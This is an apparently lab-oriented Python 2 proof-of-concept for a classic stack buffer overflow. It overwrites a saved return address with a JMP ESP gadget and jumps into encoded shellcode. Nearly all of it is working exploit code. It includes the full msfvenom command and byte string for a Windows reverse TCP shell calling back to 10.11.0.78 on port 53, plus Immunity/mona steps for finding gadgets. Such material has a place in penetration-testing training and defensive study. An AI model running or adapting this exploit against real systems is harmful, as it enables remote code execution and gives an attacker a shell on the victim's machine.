#!/usr/bin/env python2
"""Stack-overflow proof-of-concept: overwrite a saved return address with the
address of a JMP ESP gadget and land in shellcode placed right after it.

Python 2 only (``print`` statement; ``str`` is a byte string).  HOST, PORT,
BUFFER_OFFSET, BUFFER_TOTLEN and send_payload are not defined in this file
and are expected to come from the star-import of ``constants``.

Layout of the request body that is sent::

    "A" * BUFFER_OFFSET | ptr_jmp_esp (LE) | SUB ESP,0x10 | shellcode | "D" padding | CRLF

This only works against an unhardened target: it depends on a fixed,
non-randomised module address (no ASLR) and on an executable stack
(no DEP/NX) -- the author's own notes below call both out.  Any of ASLR,
DEP/NX or stack canaries on the target breaks the pattern, and a long run
of a single filler byte followed by a pointer is a classic signature for
network IDS rules.
"""
import socket
import struct
from constants import *

# x86 ``sub esp, 0x10`` (83 EC 10).  Placed so it sits at ESP when JMP ESP
# fires; presumably moves the stack pointer off the bytes that follow so the
# shellcode's decoder stub does not overwrite itself on the stack -- verify
# against the payload actually used.
SUB_ESP_10 = "\x83\xec\x10"

# Plain TCP connection to the target.  NOTE(review): the socket is never
# closed in this script; it is released only at process exit.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# Operator reminder: the gadget address and shellcode below are specific to
# one target binary and one listener and have to be regenerated per run.
print "Run !mona jmp -r esp -cpb \"BAD_CHARS\" to find a JMP ESP instruction in Immunity"
print "Then generate appropriate shellcode. see comments"

# !mona jmp -r esp -cpb "\x00\x0A"
# Address of a JMP ESP gadget in the target process.  It is packed
# little-endian (struct "<I") so it lands on the saved return address.  Per
# the notes it must avoid the bad characters (\x00, \x0a) and must come from
# a module without ASLR/DEP/NX, otherwise execution never reaches the stack.
ptr_jmp_esp = 0x5f4a358f
# if that doesn't work, then:
#Modules: !mona modules -- Look for no DEP, NX, ASLR && No Bad Char in address
#go to the module "e then double click module"
#!mona find -s esp -m MODULE.dll -cpb "\x00\x0a" "look for JMP ESP or PUSH ESP RETN"
#if no DEP, you can try "./nasm_shell JMP ESP > FFE4"
#!mona find -s "\xff\xe4" -m MODULE.dll -cpb "\x00\x0a"
#Ensure JMP ESP by following address in disassembler "click on it then hit enter"
#You can also try !mona suggest to see what would work

# msfvenom -p windows/shell_reverse_tcp -b '\x00\x0A' -f python -v shellcode EXITFUNC=thread LHOST=10.11.0.78 LPORT=53
# Encoded payload emitted by the msfvenom command above (``-b`` excludes the
# two bad characters).  The bytes are opaque here; they are tied to the
# LHOST/LPORT in that command and must be regenerated for any other listener.
shellcode = ""
shellcode += "\xb8\x79\xe2\x6c\xab\xdb\xc0\xd9\x74\x24\xf4\x5b"
shellcode += "\x33\xc9\xb1\x52\x31\x43\x12\x03\x43\x12\x83\xba"
shellcode += "\xe6\x8e\x5e\xc0\x0f\xcc\xa1\x38\xd0\xb1\x28\xdd"
shellcode += "\xe1\xf1\x4f\x96\x52\xc2\x04\xfa\x5e\xa9\x49\xee"
shellcode += "\xd5\xdf\x45\x01\x5d\x55\xb0\x2c\x5e\xc6\x80\x2f"
shellcode += "\xdc\x15\xd5\x8f\xdd\xd5\x28\xce\x1a\x0b\xc0\x82"
shellcode += "\xf3\x47\x77\x32\x77\x1d\x44\xb9\xcb\xb3\xcc\x5e"
shellcode += "\x9b\xb2\xfd\xf1\x97\xec\xdd\xf0\x74\x85\x57\xea"
shellcode += "\x99\xa0\x2e\x81\x6a\x5e\xb1\x43\xa3\x9f\x1e\xaa"
shellcode += "\x0b\x52\x5e\xeb\xac\x8d\x15\x05\xcf\x30\x2e\xd2"
shellcode += "\xad\xee\xbb\xc0\x16\x64\x1b\x2c\xa6\xa9\xfa\xa7"
shellcode += "\xa4\x06\x88\xef\xa8\x99\x5d\x84\xd5\x12\x60\x4a"
shellcode += "\x5c\x60\x47\x4e\x04\x32\xe6\xd7\xe0\x95\x17\x07"
shellcode += "\x4b\x49\xb2\x4c\x66\x9e\xcf\x0f\xef\x53\xe2\xaf"
shellcode += "\xef\xfb\x75\xdc\xdd\xa4\x2d\x4a\x6e\x2c\xe8\x8d"
shellcode += "\x91\x07\x4c\x01\x6c\xa8\xad\x08\xab\xfc\xfd\x22"
shellcode += "\x1a\x7d\x96\xb2\xa3\xa8\x39\xe2\x0b\x03\xfa\x52"
shellcode += "\xec\xf3\x92\xb8\xe3\x2c\x82\xc3\x29\x45\x29\x3e"
shellcode += "\xba\x60\xa5\x40\x74\x1d\xbb\x40\x88\xe8\x32\xa6"
shellcode += "\xe2\x02\x13\x71\x9b\xbb\x3e\x09\x3a\x43\x95\x74"
shellcode += "\x7c\xcf\x1a\x89\x33\x38\x56\x99\xa4\xc8\x2d\xc3"
shellcode += "\x63\xd6\x9b\x6b\xef\x45\x40\x6b\x66\x76\xdf\x3c"
shellcode += "\x2f\x48\x16\xa8\xdd\xf3\x80\xce\x1f\x65\xea\x4a"
shellcode += "\xc4\x56\xf5\x53\x89\xe3\xd1\x43\x57\xeb\x5d\x37"
shellcode += "\x07\xba\x0b\xe1\xe1\x14\xfa\x5b\xb8\xcb\x54\x0b"
shellcode += "\x3d\x20\x67\x4d\x42\x6d\x11\xb1\xf3\xd8\x64\xce"
shellcode += "\x3c\x8d\x60\xb7\x20\x2d\x8e\x62\xe1\x4d\x6d\xa6"
shellcode += "\x1c\xe6\x28\x23\x9d\x6b\xcb\x9e\xe2\x95\x48\x2a"
shellcode += "\x9b\x61\x50\x5f\x9e\x2e\xd6\x8c\xd2\x3f\xb3\xb2"
shellcode += "\x41\x3f\x96"

# Assemble the request body in the order shown in the module docstring.
buf = ""
# buf is empty here, so this is exactly BUFFER_OFFSET filler bytes -- the
# distance from the start of the overflowed buffer to the saved return address.
buf += "A"*(BUFFER_OFFSET - len(buf))
# Overwrites the saved return address with the gadget (little-endian).
buf += struct.pack("<I", ptr_jmp_esp)
# First bytes executed once the gadget transfers control to the stack.
buf += SUB_ESP_10
buf += shellcode
# Pad to the fixed total length.  If buf already exceeds BUFFER_TOTLEN the
# multiplier is negative and Python yields "" -- no padding, no error, and
# the request is silently longer than BUFFER_TOTLEN.
buf += "D"*(BUFFER_TOTLEN - len(buf))
# Line terminator; presumably the target's parser is line-oriented (\x0a is
# listed as a bad character above for the same reason) -- verify.
buf += "\r\n"
# send_payload is provided by ``constants``; how it frames/writes buf is not
# visible here.
send_payload(s, buf)